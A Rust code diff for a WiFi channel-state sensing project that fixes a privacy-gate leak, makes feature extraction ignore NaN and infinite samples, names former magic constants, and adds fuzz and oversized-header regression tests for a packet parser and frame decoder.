||||
assert_eq!(zone.payload, r#""living\"room\\back""#);
|
||||
// And it must parse as JSON back to the original zone string.
|
||||
let parsed: String = serde_json::from_str(&zone.payload).expect("valid JSON string");
|
||||
assert_eq!(parsed, r#"living"room\back"#);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn identity_risk_payload_is_fixed_precision_decimal() {
|
||||
let msgs = render_events(&sample_event(PrivacyClass::Anonymous, false));
|
||||
|
||||
@@ -88,6 +88,11 @@ fn process_to_frame_returns_none_under_sustained_high_risk() {
|
||||
|
||||
#[test]
|
||||
fn process_to_frame_round_trips_through_bytes() {
|
||||
// Default pipeline class is Anonymous(2). The frame must round-trip through
|
||||
// wire bytes with no CRC error; the payload it carries is the privacy-gated
|
||||
// (angle-matrix-stripped) form, not the raw input — see
|
||||
// process_to_frame_at_anonymous_strips_identity_leaky_sections for the
|
||||
// content assertion. This test pins byte/CRC consistency only.
|
||||
let mut p = BfldPipeline::new(BfldConfig::new("seed-01"));
|
||||
let frame = p
|
||||
.process_to_frame(
|
||||
@@ -100,7 +105,10 @@ fn process_to_frame_round_trips_through_bytes() {
|
||||
let bytes = frame.to_bytes();
|
||||
let parsed = BfldFrame::from_bytes(&bytes).expect("frame must round-trip");
|
||||
let parsed_payload = parsed.parse_payload().expect("payload must round-trip");
|
||||
assert_eq!(parsed_payload, typed_payload());
|
||||
// Round-trip preserves whatever the privacy gate left in place.
|
||||
assert_eq!(parsed_payload, frame.parse_payload().unwrap());
|
||||
// And the identity surface is gone at Anonymous.
|
||||
assert!(parsed_payload.compressed_angle_matrix.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
@@ -141,6 +149,94 @@ fn process_to_frame_preserves_header_template_identity_fields() {
|
||||
assert_eq!({ frame.header.channel }, 36);
|
||||
}
|
||||
|
||||
// --- ADR-141 privacy-gate-correctness regression -------------------------
|
||||
//
|
||||
// `process_to_frame` stamps the frame with the pipeline's privacy_class but
|
||||
// (pre-fix) serialized the caller-supplied payload UNCHANGED. That let a frame
|
||||
// labeled Anonymous(2) / Restricted(3) carry the full identity-leaky
|
||||
// `compressed_angle_matrix` (+ amplitude/phase/csi_delta) that
|
||||
// `PrivacyGate::demote` is documented (privacy_gate_demote.rs) to strip at
|
||||
// exactly those classes. A NetworkSink accepts class >= Derived, so such a
|
||||
// frame would publish the beamforming angle matrix (identity surface) to the
|
||||
// network despite its restrictive class byte. These tests pin that the payload
|
||||
// content matches what the stamped class permits.
|
||||
|
||||
#[test]
|
||||
fn process_to_frame_at_anonymous_strips_identity_leaky_sections() {
|
||||
// Default pipeline class is Anonymous(2): the angle matrix and csi_delta
|
||||
// MUST NOT survive into the emitted frame, matching PrivacyGate::demote.
|
||||
let mut p = BfldPipeline::new(BfldConfig::new("seed-01"));
|
||||
let mut leaky = typed_payload();
|
||||
leaky.csi_delta = Some(vec![0x55; 24]);
|
||||
let frame = p
|
||||
.process_to_frame(
|
||||
inputs(1_700_000_000_000_000_000, [0.1, 0.1, 0.1, 0.1]),
|
||||
header_template(),
|
||||
leaky,
|
||||
Some(embedding()),
|
||||
)
|
||||
.expect("low-risk frame must be emitted");
|
||||
assert_eq!({ frame.header.privacy_class }, PrivacyClass::Anonymous.as_u8());
|
||||
let payload = frame.parse_payload().expect("payload parses");
|
||||
assert!(
|
||||
payload.compressed_angle_matrix.is_empty(),
|
||||
"Anonymous frame must NOT carry the compressed_angle_matrix (identity surface)",
|
||||
);
|
||||
assert!(
|
||||
payload.csi_delta.is_none(),
|
||||
"Anonymous frame must NOT carry csi_delta",
|
||||
);
|
||||
// Aggregate sensing sections survive.
|
||||
assert_eq!(payload.snr_vector.len(), 8);
|
||||
assert_eq!(payload.amplitude_proxy.len(), 16);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn process_to_frame_in_privacy_mode_strips_amplitude_and_phase() {
|
||||
// privacy_mode -> Restricted(3): amplitude + phase proxies must ALSO drop.
|
||||
let mut p = BfldPipeline::new(
|
||||
BfldConfig::new("seed-01").with_privacy_class(PrivacyClass::Anonymous),
|
||||
);
|
||||
p.enable_privacy_mode();
|
||||
let frame = p
|
||||
.process_to_frame(
|
||||
inputs(0, [0.1, 0.1, 0.1, 0.1]),
|
||||
header_template(),
|
||||
typed_payload(),
|
||||
Some(embedding()),
|
||||
)
|
||||
.expect("frame emitted");
|
||||
assert_eq!({ frame.header.privacy_class }, PrivacyClass::Restricted.as_u8());
|
||||
let payload = frame.parse_payload().expect("payload parses");
|
||||
assert!(payload.compressed_angle_matrix.is_empty(), "angle matrix stripped at Restricted");
|
||||
assert!(payload.amplitude_proxy.is_empty(), "amplitude stripped at Restricted");
|
||||
assert!(payload.phase_proxy.is_empty(), "phase stripped at Restricted");
|
||||
assert_eq!(payload.snr_vector.len(), 8, "snr_vector survives");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn process_to_frame_at_derived_preserves_full_payload() {
|
||||
// Derived(1) is a research mode that legitimately keeps the angle matrix.
|
||||
// The strip must NOT over-fire at classes below Anonymous.
|
||||
let mut p = BfldPipeline::new(
|
||||
BfldConfig::new("seed-01").with_privacy_class(PrivacyClass::Derived),
|
||||
);
|
||||
let frame = p
|
||||
.process_to_frame(
|
||||
inputs(0, [0.1, 0.1, 0.1, 0.1]),
|
||||
header_template(),
|
||||
typed_payload(),
|
||||
Some(embedding()),
|
||||
)
|
||||
.expect("frame emitted");
|
||||
assert_eq!({ frame.header.privacy_class }, PrivacyClass::Derived.as_u8());
|
||||
let payload = frame.parse_payload().expect("payload parses");
|
||||
assert_eq!(
|
||||
payload, typed_payload(),
|
||||
"Derived research frame keeps the full payload unchanged",
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn process_to_frame_uses_input_timestamp_not_template_timestamp() {
|
||||
let mut p = BfldPipeline::new(BfldConfig::new("seed-01"));
|
||||
|
||||
@@ -43,6 +43,20 @@ pub struct Features {
|
||||
pub const EMBED_MIN_SCORE: f32 = 0.25;
|
||||
|
||||
impl Features {
|
||||
/// The all-zero feature vector — the well-defined result of an empty (or
|
||||
/// wholly non-finite) capture. Total by construction: downstream
|
||||
/// specialists read it as "no signal" rather than panicking or poisoning a
|
||||
/// threshold (see [`Features::from_series`]).
|
||||
pub const ZERO: Features = Features {
|
||||
mean: 0.0,
|
||||
variance: 0.0,
|
||||
motion: 0.0,
|
||||
breathing_score: 0.0,
|
||||
breathing_hz: 0.0,
|
||||
heart_score: 0.0,
|
||||
heart_hz: 0.0,
|
||||
};
|
||||
|
||||
/// A fixed-length numeric embedding for nearest-prototype classifiers.
|
||||
///
|
||||
/// The hz components are zeroed unless their periodicity score clears
|
||||
@@ -77,29 +91,33 @@ impl Features {
|
||||
}
|
||||
|
||||
/// Extract features from a per-frame scalar series sampled at `fs` Hz.
|
||||
///
|
||||
/// **Total / fail-closed:** non-finite samples (`NaN`/`±inf`) are dropped
|
||||
/// before any statistic is computed, so a single garbage CSI frame cannot
|
||||
/// poison `mean`/`variance` into `NaN` and silently disable a persisted
|
||||
/// specialist (a `NaN` threshold makes every `>` comparison false). A
|
||||
/// series with no finite samples yields [`Features::ZERO`], exactly like
|
||||
/// the empty series. Same defensive contract as
|
||||
/// [`GeometryEmbedding`](crate::geometry_embedding::GeometryEmbedding):
|
||||
/// adversarial input degrades to "no signal", never to `NaN`.
|
||||
pub fn from_series(series: &[f32], fs: f32) -> Features {
|
||||
let n = series.len();
|
||||
// Drop non-finite samples: a corrupt frame counts as no frame, not as
|
||||
// a NaN that propagates through every downstream statistic.
|
||||
let clean: Vec<f32> = series.iter().copied().filter(|v| v.is_finite()).collect();
|
||||
let n = clean.len();
|
||||
if n == 0 {
|
||||
return Features {
|
||||
mean: 0.0,
|
||||
variance: 0.0,
|
||||
motion: 0.0,
|
||||
breathing_score: 0.0,
|
||||
breathing_hz: 0.0,
|
||||
heart_score: 0.0,
|
||||
heart_hz: 0.0,
|
||||
};
|
||||
return Features::ZERO;
|
||||
}
|
||||
let mean = series.iter().copied().sum::<f32>() / n as f32;
|
||||
let variance = series.iter().map(|v| (v - mean) * (v - mean)).sum::<f32>() / n as f32;
|
||||
let mean = clean.iter().copied().sum::<f32>() / n as f32;
|
||||
let variance = clean.iter().map(|v| (v - mean) * (v - mean)).sum::<f32>() / n as f32;
|
||||
let motion = if n > 1 {
|
||||
series.windows(2).map(|w| (w[1] - w[0]).abs()).sum::<f32>() / (n - 1) as f32
|
||||
clean.windows(2).map(|w| (w[1] - w[0]).abs()).sum::<f32>() / (n - 1) as f32
|
||||
} else {
|
||||
0.0
|
||||
};
|
||||
|
||||
// De-mean before periodicity search.
|
||||
let centered: Vec<f32> = series.iter().map(|v| v - mean).collect();
|
||||
let centered: Vec<f32> = clean.iter().map(|v| v - mean).collect();
|
||||
let (breathing_hz, breathing_score) = autocorr_dominant(&centered, fs, 0.1, 0.6);
|
||||
let (heart_hz, heart_score) = autocorr_dominant(&centered, fs, 0.8, 3.0);
|
||||
|
||||
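The fail-closed filtering in `from_series` can be checked in isolation. The sketch below covers only the mean and population variance, using a hypothetical helper `finite_mean_variance` that is not part of the crate; it drops non-finite samples first, as the hunk does, and returns zeros when nothing finite remains.

```rust
/// Mean and population variance over the finite samples only.
/// Returns `(0.0, 0.0)` when the series has no finite sample,
/// mirroring the "no signal" result for an empty capture.
pub fn finite_mean_variance(series: &[f32]) -> (f32, f32) {
    // A corrupt sample counts as no sample rather than as a NaN that
    // would propagate through every later statistic.
    let clean: Vec<f32> = series.iter().copied().filter(|v| v.is_finite()).collect();
    if clean.is_empty() {
        return (0.0, 0.0);
    }
    let n = clean.len() as f32;
    let mean = clean.iter().sum::<f32>() / n;
    let variance = clean.iter().map(|v| (v - mean) * (v - mean)).sum::<f32>() / n;
    (mean, variance)
}
```

For the series `[1, 2, NaN, 4, inf, 6]` the finite samples are `{1, 2, 4, 6}`, giving a mean of 3.25 and a variance of 14.75 / 4 = 3.6875. Without the filter both values would be `NaN`, and since any comparison against `NaN` is false, a threshold derived from them would never trigger.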
@@ -254,6 +272,36 @@ mod tests {
|
||||
assert_eq!(f.breathing_hz, 0.0);
|
||||
}
|
||||
|
||||
/// Fail-closed regression: a NaN/inf in the scalar series (corrupt CSI
|
||||
/// frame) must NOT poison the features into `NaN`/`inf`. Pre-fix, a single
|
||||
/// `NaN` made `mean`/`variance` `NaN`, which — baked into a persisted
|
||||
/// `PresenceSpecialist::threshold` — silently disabled presence detection
|
||||
/// (every `f.variance > NaN` is false). Non-finite samples are dropped.
|
||||
#[test]
|
||||
fn non_finite_samples_do_not_poison_features() {
|
||||
let f = Features::from_series(&[1.0, 2.0, f32::NAN, 4.0, f32::INFINITY, 6.0], 15.0);
|
||||
assert!(f.mean.is_finite(), "mean must stay finite, got {}", f.mean);
|
||||
assert!(f.variance.is_finite(), "variance must stay finite, got {}", f.variance);
|
||||
assert!(f.motion.is_finite(), "motion must stay finite, got {}", f.motion);
|
||||
for x in f.embedding() {
|
||||
assert!(x.is_finite(), "embedding slot non-finite: {x}");
|
||||
}
|
||||
// Mean is over the 4 finite samples {1,2,4,6} only.
|
||||
assert!((f.mean - 3.25).abs() < 1e-5, "mean over finite samples, got {}", f.mean);
|
||||
// Equivalence: dropping the non-finite samples must equal feeding only
|
||||
// the finite ones — proves the filter, not just finiteness.
|
||||
let only_finite = Features::from_series(&[1.0, 2.0, 4.0, 6.0], 15.0);
|
||||
assert_eq!(f, only_finite);
|
||||
}
|
||||
|
||||
/// A series with no finite samples degrades to the all-zero `ZERO`, exactly
|
||||
/// like the empty series — never `NaN`.
|
||||
#[test]
|
||||
fn all_non_finite_series_is_zero() {
|
||||
let f = Features::from_series(&[f32::NAN, f32::INFINITY, f32::NEG_INFINITY], 15.0);
|
||||
assert_eq!(f, Features::ZERO);
|
||||
}
|
||||
|
||||
/// ADR-152 "heart-band leakage" regression: a strong breathing rhythm must
|
||||
/// NOT register as a heart-band periodicity — its in-band autocorr maximum
|
||||
/// sits at the band edge (monotonic leak), not an interior peak.
|
||||
|
||||
@@ -15,6 +15,28 @@ use serde::{Deserialize, Serialize};
|
||||
use crate::anchor::{AnchorLabel, Posture};
|
||||
use crate::extract::{AnchorFeature, Features};
|
||||
|
||||
/// Default minimum breathing-band periodicity score to report a rate, used when
|
||||
/// a [`BreathingSpecialist`] carries no explicit `min_score` (the serde / pre-
|
||||
/// trained-default case). Respiration is a strong, narrowband modulation, so a
|
||||
/// moderate floor rejects noise windows without dropping real breaths.
|
||||
pub const DEFAULT_BREATHING_MIN_SCORE: f32 = 0.25;
|
||||
|
||||
/// Default minimum HR-band periodicity score, used when a [`HeartbeatSpecialist`]
|
||||
/// carries no explicit `min_score`. Higher than breathing's: sub-mm chest
|
||||
/// displacement at HR frequencies sits near the CSI noise floor (ADR-151 §3.2),
|
||||
/// so the heartbeat head demands a cleaner peak before reporting.
|
||||
pub const DEFAULT_HEARTBEAT_MIN_SCORE: f32 = 0.3;
|
||||
|
||||
/// Multiple of the typical inter-anchor spread ([`AnomalySpecialist::scale`])
|
||||
/// beyond which a live window is fully out-of-distribution (anomaly score 1.0):
|
||||
/// a window more than this many spreads from every enrolled prototype is novel.
|
||||
pub const ANOMALY_OUTLIER_SPREADS: f32 = 2.0;
|
||||
|
||||
/// Anomaly score above which the window is *labelled* "anomalous" (vs "normal").
|
||||
/// Distinct from the runtime veto threshold ([`crate::runtime`]); this only
|
||||
/// drives the human-readable label.
|
||||
pub const ANOMALY_LABEL_CUTOFF: f32 = 0.5;
|
||||
|
||||
/// Which biological signal a specialist estimates.
|
||||
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
|
||||
pub enum SpecialistKind {
|
||||
@@ -229,7 +251,7 @@ impl Specialist for BreathingSpecialist {
|
||||
let min = if self.min_score > 0.0 {
|
||||
self.min_score
|
||||
} else {
|
||||
0.25
|
||||
DEFAULT_BREATHING_MIN_SCORE
|
||||
};
|
||||
if f.breathing_score < min || f.breathing_hz <= 0.0 {
|
||||
return None;
|
||||
@@ -258,7 +280,7 @@ impl Specialist for HeartbeatSpecialist {
|
||||
let min = if self.min_score > 0.0 {
|
||||
self.min_score
|
||||
} else {
|
||||
0.3
|
||||
DEFAULT_HEARTBEAT_MIN_SCORE
|
||||
};
|
||||
if f.heart_score < min || f.heart_hz <= 0.0 {
|
||||
return None;
|
||||
@@ -383,13 +405,13 @@ impl Specialist for AnomalySpecialist {
|
||||
.sqrt();
|
||||
best = best.min(d);
|
||||
}
|
||||
// >2× the typical spread → anomalous.
|
||||
let score = (best / (2.0 * self.scale)).clamp(0.0, 1.0);
|
||||
// Beyond ANOMALY_OUTLIER_SPREADS× the typical spread → fully anomalous.
|
||||
let score = (best / (ANOMALY_OUTLIER_SPREADS * self.scale)).clamp(0.0, 1.0);
|
||||
Some(SpecialistReading {
|
||||
kind: SpecialistKind::Anomaly,
|
||||
value: score,
|
||||
confidence: 0.6,
|
||||
label: Some(if score > 0.5 { "anomalous" } else { "normal" }.into()),
|
||||
label: Some(if score > ANOMALY_LABEL_CUTOFF { "anomalous" } else { "normal" }.into()),
|
||||
})
|
||||
}
|
||||
}
|
||||
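The anomaly scoring in the hunk above reduces to a clamped ratio plus a label cutoff. The following sketch restates it as two free functions; the constants match the values in the diff, while `anomaly_score` and `anomaly_label` are hypothetical names, and the sketch assumes `scale` is strictly positive.

```rust
/// Values as named in the diff.
pub const ANOMALY_OUTLIER_SPREADS: f32 = 2.0;
pub const ANOMALY_LABEL_CUTOFF: f32 = 0.5;

/// Map the distance to the nearest enrolled prototype onto [0, 1].
/// A distance of `ANOMALY_OUTLIER_SPREADS * scale` or more saturates at 1.0.
/// Assumes `scale > 0.0`; a zero scale is not handled in this sketch.
pub fn anomaly_score(best_distance: f32, scale: f32) -> f32 {
    (best_distance / (ANOMALY_OUTLIER_SPREADS * scale)).clamp(0.0, 1.0)
}

/// Human-readable label; the comparison is strict, so a score exactly at
/// the cutoff is still "normal".
pub fn anomaly_label(score: f32) -> &'static str {
    if score > ANOMALY_LABEL_CUTOFF {
        "anomalous"
    } else {
        "normal"
    }
}
```

With `scale = 1.0`, a window one spread away from its nearest prototype scores 0.5 and is labelled "normal", while anything at two spreads or beyond scores 1.0 and is labelled "anomalous".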
@@ -505,6 +527,32 @@ mod tests {
|
||||
assert!(b.infer(&feat(5.0, 0.2, 0.3, 0.1)).is_none()); // low score → none
|
||||
}
|
||||
|
||||
/// De-magic pin: the named default min-scores must equal the historical
|
||||
/// literal values, and the gate boundary must be `score >= min` (a window
|
||||
/// exactly at the default floor reports; a hair below does not).
|
||||
#[test]
|
||||
fn default_min_score_constants_match_prior_literals() {
|
||||
assert_eq!(DEFAULT_BREATHING_MIN_SCORE, 0.25);
|
||||
assert_eq!(DEFAULT_HEARTBEAT_MIN_SCORE, 0.3);
|
||||
let b = BreathingSpecialist::default(); // min_score = 0.0 → uses default
|
||||
assert!(
|
||||
b.infer(&feat(5.0, 0.2, 0.3, DEFAULT_BREATHING_MIN_SCORE)).is_some(),
|
||||
"score exactly at the default floor must report"
|
||||
);
|
||||
assert!(
|
||||
b.infer(&feat(5.0, 0.2, 0.3, DEFAULT_BREATHING_MIN_SCORE - 1e-3)).is_none(),
|
||||
"score below the default floor must not report"
|
||||
);
|
||||
}
|
||||
|
||||
/// De-magic pin for the anomaly score scale + label cutoff (value-identical
|
||||
/// to the prior `2.0 * scale` / `> 0.5` literals).
|
||||
#[test]
|
||||
fn anomaly_constants_match_prior_literals() {
|
||||
assert_eq!(ANOMALY_OUTLIER_SPREADS, 2.0);
|
||||
assert_eq!(ANOMALY_LABEL_CUTOFF, 0.5);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn restlessness_normalizes() {
|
||||
let anchors = vec![
|
||||
|
||||
@@ -471,6 +471,54 @@ mod tests {
|
||||
assert!(ht.record(&f).is_err());
|
||||
}
|
||||
|
||||
/// Security pin (review 2026-06, ADR-127): the UDP parser is the CLI's
|
||||
/// widest attack surface — `calibrate` / `enroll` / `room-watch` bind it to
|
||||
/// 0.0.0.0 by default, so any host on the LAN can send arbitrary bytes. A
|
||||
/// header that *claims* a huge `n_antennas * n_subcarriers` must be rejected
|
||||
/// by the length check BEFORE the `Array2::zeros` allocation, so a single
|
||||
/// small datagram can never trigger a multi-MB allocation (unbounded-memory
|
||||
/// DoS). The largest possible claim (255 × 65535 pairs ≈ 33 MB of IQ) inside
|
||||
/// a RECV_BUF-sized (2048-byte) datagram parses to `None`, never OOMs.
|
||||
#[test]
|
||||
fn test_parse_csi_packet_oversized_claim_is_rejected_not_allocated() {
|
||||
let mut buf = vec![0u8; RECV_BUF];
|
||||
buf[0..4].copy_from_slice(&0xC511_0001u32.to_le_bytes());
|
||||
buf[4] = 1; // node_id
|
||||
buf[5] = 255; // n_antennas (max)
|
||||
buf[6..8].copy_from_slice(&65535u16.to_le_bytes()); // n_subcarriers (max)
|
||||
buf[8..12].copy_from_slice(&2432u32.to_le_bytes());
|
||||
// n_pairs = 255 * 65535 = 16_711_425 → needs ~33 MB of IQ bytes that a
|
||||
// 2048-byte datagram cannot carry → length check fails → None.
|
||||
assert!(parse_csi_packet(&buf, "ht20").is_none());
|
||||
}
|
||||
|
||||
/// Security pin (review 2026-06): the parser must never panic on ANY byte
|
||||
/// string — truncated headers, lying length fields, odd sizes. IQ-loop
|
||||
/// indexing is guarded by the length check; this sweeps a spread of
|
||||
/// adversarial inputs to lock in panic-on-adversarial-input = 0.
|
||||
#[test]
|
||||
fn test_parse_csi_packet_never_panics_on_arbitrary_bytes() {
|
||||
let mut st = 0x1234_5678u64;
|
||||
let mut next = move || {
|
||||
st = st
|
||||
.wrapping_mul(6_364_136_223_846_793_005)
|
||||
.wrapping_add(1_442_695_040_888_963_407);
|
||||
(st >> 33) as u8
|
||||
};
|
||||
for len in 0..600usize {
|
||||
let buf: Vec<u8> = (0..len).map(|_| next()).collect();
|
||||
for tier in ["ht20", "he20", "garbage"] {
|
||||
let _ = parse_csi_packet(&buf, tier);
|
||||
}
|
||||
}
|
||||
// Valid magic, lying n_subcarriers, no payload → None (not a panic).
|
||||
let mut buf = vec![0u8; 20];
|
||||
buf[0..4].copy_from_slice(&0xC511_0001u32.to_le_bytes());
|
||||
buf[5] = 3;
|
||||
buf[6..8].copy_from_slice(&500u16.to_le_bytes());
|
||||
assert!(parse_csi_packet(&buf, "ht20").is_none());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_freq_to_channel_24ghz() {
|
||||
assert_eq!(freq_mhz_to_channel(2437), 6);
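The two security pins above rely on one ordering rule: compare the size the header claims against the bytes actually received, and only then allocate. The following is a minimal sketch of that rule, not the crate's parser. `parse_iq`, `HEADER_LEN = 20`, and the decision to return raw `(i8, i8)` pairs are assumptions made for illustration; only the magic value and the offsets of `n_antennas` and `n_subcarriers` are taken from the tests.

```rust
/// Magic value as written by the tests above.
const MAGIC: u32 = 0xC511_0001;
/// ASSUMPTION: header length chosen for this sketch, not confirmed by the source.
const HEADER_LEN: usize = 20;

/// Hypothetical parser: returns the I/Q pairs, or `None` for any malformed datagram.
fn parse_iq(buf: &[u8]) -> Option<Vec<(i8, i8)>> {
    if buf.len() < HEADER_LEN {
        return None; // truncated header
    }
    let magic = u32::from_le_bytes([buf[0], buf[1], buf[2], buf[3]]);
    if magic != MAGIC {
        return None;
    }
    let n_antennas = usize::from(buf[5]);
    let n_subcarriers = usize::from(u16::from_le_bytes([buf[6], buf[7]]));

    // Checked arithmetic: a lying header must not overflow the size computation.
    let n_pairs = n_antennas.checked_mul(n_subcarriers)?;
    let need = n_pairs.checked_mul(2)?.checked_add(HEADER_LEN)?;

    // Length check BEFORE allocation: the claim must fit in the bytes we hold.
    if n_pairs == 0 || buf.len() < need {
        return None;
    }

    // The capacity is now bounded by the datagram size, not by the header claim.
    let mut out = Vec::with_capacity(n_pairs);
    for iq in buf[HEADER_LEN..need].chunks_exact(2) {
        out.push((iq[0] as i8, iq[1] as i8));
    }
    Some(out)
}
```

Because the allocation happens after the comparison, the largest buffer a sender can force is proportional to the datagram it actually sent.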
|
||||
|
||||
@@ -1636,6 +1636,67 @@ mod tests {
|
||||
}
|
||||
}
|
||||
|
||||
/// Security pin (review 2026-06, ADR-127) — `from_canonical_bytes` is a
|
||||
/// deserialisation boundary for replayed/forwarded captures. A forged header
|
||||
/// advertising an enormous `rows × cols` must be rejected by the
|
||||
/// shape-vs-length check (`expect` uses saturating multiplies) BEFORE the
|
||||
/// `Vec::with_capacity(rows * cols)` allocation — otherwise an attacker could
|
||||
/// drive a multi-GB allocation from a few header bytes (unbounded-memory
|
||||
/// DoS). The check guarantees `rows*cols*16 <= bytes.len()`, so the capacity
|
||||
/// is bounded by the input the caller already holds. This must not OOM.
|
||||
#[test]
|
||||
fn canonical_decode_oversized_shape_is_bounded_not_allocated() {
|
||||
use ndarray::Array2;
|
||||
let meta = CsiMetadata::new(DeviceId::new("n"), FrequencyBand::Band2_4GHz, 1);
|
||||
let data = Array2::from_shape_fn((1, 2), |(_, c)| Complex64::new(c as f64, 0.0));
|
||||
let mut bytes = CsiFrame::new(meta, data).to_canonical_bytes();
|
||||
|
||||
// The (rows, cols) u32 pair is the last 8 bytes before the payload.
|
||||
// Overwrite with a maximal claim (u32::MAX × u32::MAX) and lop off the
|
||||
// payload so the buffer is tiny but the header lies enormously.
|
||||
let shape_off = bytes.len() - 8 - 2 * 16; // 2 samples × 16 bytes payload
|
||||
bytes[shape_off..shape_off + 4].copy_from_slice(&u32::MAX.to_le_bytes());
|
||||
bytes[shape_off + 4..shape_off + 8].copy_from_slice(&u32::MAX.to_le_bytes());
|
||||
bytes.truncate(shape_off + 8); // drop the real payload
|
||||
|
||||
// expect = MAX*MAX*16 (saturated) > found → PayloadMismatch, no alloc.
|
||||
assert!(matches!(
|
||||
CsiFrame::from_canonical_bytes(&bytes),
|
||||
Err(CanonicalDecodeError::PayloadMismatch { .. })
|
||||
));
|
||||
}
|
||||
|
||||
/// Security pin (review 2026-06) — the decoder must never panic on arbitrary
|
||||
/// bytes: every malformed input is a typed `CanonicalDecodeError`, never an
|
||||
/// unwinding panic (panic-on-adversarial-input = 0). Sweep truncations and a
|
||||
/// deterministic fuzz spread.
|
||||
#[test]
|
||||
fn canonical_decode_never_panics_on_arbitrary_bytes() {
|
||||
use ndarray::Array2;
|
||||
let mut meta = CsiMetadata::new(DeviceId::new("node"), FrequencyBand::Band5GHz, 36);
|
||||
meta.antenna_config.spacing_mm = Some(50.0);
|
||||
let data = Array2::from_shape_fn((2, 8), |(r, c)| Complex64::new(r as f64, c as f64));
|
||||
let good = CsiFrame::new(meta, data).to_canonical_bytes();
|
||||
|
||||
// Every prefix of a valid encoding must decode without panicking.
|
||||
for n in 0..good.len() {
|
||||
let _ = CsiFrame::from_canonical_bytes(&good[..n]);
|
||||
}
|
||||
// Deterministic LCG fuzz over varied lengths.
|
||||
let mut st = 0xDEAD_BEEFu64;
|
||||
for len in 0..400usize {
|
||||
let buf: Vec<u8> = (0..len)
|
||||
.map(|_| {
|
||||
st = st
|
||||
.wrapping_mul(6_364_136_223_846_793_005)
|
||||
.wrapping_add(1_442_695_040_888_963_407);
|
||||
(st >> 33) as u8
|
||||
})
|
||||
.collect();
|
||||
let _ = CsiFrame::from_canonical_bytes(&buf);
|
||||
}
|
||||
}
|
||||
|
||||
/// AC8c (review finding 7) — `Some(Uuid::nil())` calibration is an
|
||||
/// encoding error: nil is the wire sentinel for `None`, so encoding it
|
||||
/// would alias two distinct frames to one byte string (and one witness).
|
||||
|
||||
@@ -205,7 +205,7 @@ impl StreamingEngine {
|
||||
pub fn new(mode: PrivacyMode, model_version: u16, registration: GeoRegistration) -> Self {
|
||||
Self {
|
||||
fuser: MultistaticFuser::with_config(MultistaticConfig::default()),
|
||||
- coherence_accept: 0.85,
|
||||
+ coherence_accept: Self::DEFAULT_COHERENCE_ACCEPT,
|
||||
privacy: PrivacyModeRegistry::new(mode),
|
||||
world: WorldGraph::new(registration),
|
||||
model_version,
|
||||
@@ -213,7 +213,11 @@ impl StreamingEngine {
|
||||
array: ArrayCoordinator::new(ArrayCoordinatorConfig::default()),
|
||||
node_geom: BTreeMap::new(),
|
||||
evolution: None,
|
||||
- slam: RfSlam::with_discovery(0.5, 5, 0.6),
|
||||
+ slam: RfSlam::with_discovery(
|
||||
+ Self::SLAM_ASSOC_RADIUS_M,
|
||||
+ Self::SLAM_MIN_SIGHTINGS,
|
||||
+ Self::SLAM_MIN_COHERENCE,
|
||||
+ ),
|
||||
person_tracks: BTreeMap::new(),
|
||||
semantic_retention: Self::DEFAULT_SEMANTIC_RETENTION,
|
||||
adapter: None,
|
||||
@@ -257,6 +261,31 @@ impl StreamingEngine {
|
||||
/// durable history belongs to the recorder).
|
||||
pub const DEFAULT_SEMANTIC_RETENTION: usize = 7_200;
|
||||
|
||||
/// Cross-node coherence at or above which fusion records a positive
|
||||
/// `CoherenceGateThreshold` evidence ref (ADR-137). Below it the cycle still
|
||||
/// emits, but without that corroborating evidence — so this gate shapes the
|
||||
/// trust record, not the privacy class. (== prior inline 0.85.)
|
||||
pub const DEFAULT_COHERENCE_ACCEPT: f32 = 0.85;
|
||||
|
||||
/// ADR-143 reflector-discovery parameters used to build the persistent
|
||||
/// `RfSlam`: association radius (m) within which two sightings are the same
|
||||
/// reflector, the minimum number of sightings before a reflector is
|
||||
/// considered stable, and the minimum per-sighting coherence to admit it.
|
||||
/// (== prior inline `with_discovery(0.5, 5, 0.6)`.)
|
||||
pub const SLAM_ASSOC_RADIUS_M: f64 = 0.5;
|
||||
/// Minimum sightings before a discovered reflector is treated as stable.
|
||||
pub const SLAM_MIN_SIGHTINGS: u64 = 5;
|
||||
/// Minimum per-sighting coherence to admit a reflector sighting.
|
||||
pub const SLAM_MIN_COHERENCE: f32 = 0.6;
|
||||
|
||||
/// ADR-143 static-anchor classification thresholds passed to
|
||||
/// `RfSlam::static_anchors`: the wall/ceiling stationarity ceiling and the
|
||||
/// mobile-reflector floor (anchors more mobile than this are dropped, not
|
||||
/// persisted). (== prior inline `static_anchors(0.05, 1.0)`.)
|
||||
pub const ANCHOR_WALL_CEILING: f64 = 0.05;
|
||||
/// Mobility floor above which a reflector is treated as mobile (skipped).
|
||||
pub const ANCHOR_MOBILE_FLOOR: f64 = 1.0;
|
||||
|
||||
/// Override the `SemanticState` retention cap (minimum 1).
|
||||
pub fn set_semantic_retention(&mut self, max_states: usize) {
|
||||
self.semantic_retention = max_states.max(1);
|
||||
@@ -331,7 +360,9 @@ impl StreamingEngine {
|
||||
self.slam.observe(obs);
|
||||
}
|
||||
let mut written = Vec::new();
|
||||
- for (pos, class) in self.slam.static_anchors(0.05, 1.0) {
|
||||
+ for (pos, class) in
|
||||
+ self.slam.static_anchors(Self::ANCHOR_WALL_CEILING, Self::ANCHOR_MOBILE_FLOOR)
|
||||
+ {
|
||||
let kind = match class {
|
||||
wifi_densepose_signal::ruvsense::ReflectorClass::Wall => AnchorKind::Reflector,
|
||||
wifi_densepose_signal::ruvsense::ReflectorClass::Furniture => AnchorKind::Furniture,
|
||||
@@ -595,19 +626,46 @@ impl StreamingEngine {
|
||||
}
|
||||
}
|
||||
|
||||
/// Domain-separation tag for the witness hash. Bumping this string
|
||||
/// intentionally invalidates every previously-recorded witness (a schema break).
|
||||
const WITNESS_DOMAIN: &[u8] = b"ruview.engine.witness.v1";
|
||||
|
||||
/// Length-prefix a variable-length field into the witness hash so adjacent
|
||||
/// fields can never be confused for one another. The 8-byte little-endian
|
||||
/// length makes the field framing unambiguous regardless of the bytes inside
|
||||
/// it (a field can contain the separator, the domain tag, anything).
|
||||
fn witness_field(h: &mut blake3::Hasher, bytes: &[u8]) {
|
||||
